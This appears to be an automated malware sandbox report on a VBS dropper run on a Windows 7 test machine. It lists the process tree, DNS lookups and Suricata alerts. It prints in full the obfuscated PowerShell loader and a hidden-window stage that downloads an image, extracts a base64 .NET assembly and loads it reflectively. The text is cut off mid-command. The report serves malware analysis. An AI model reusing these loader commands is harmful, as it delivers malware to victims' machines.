Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Oct. 19, 2023, 6:25 p.m. | Oct. 19, 2023, 6:27 p.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\westartagain.vbs
3052-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2184-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmduaW5pbmlnZWJ3ZW4vNjMyLjM1Mi42NTEuNDkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
2348
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
wallpapercave.com | 172.67.29.26 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49166 -> 172.67.29.26:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49165 -> 172.67.29.26:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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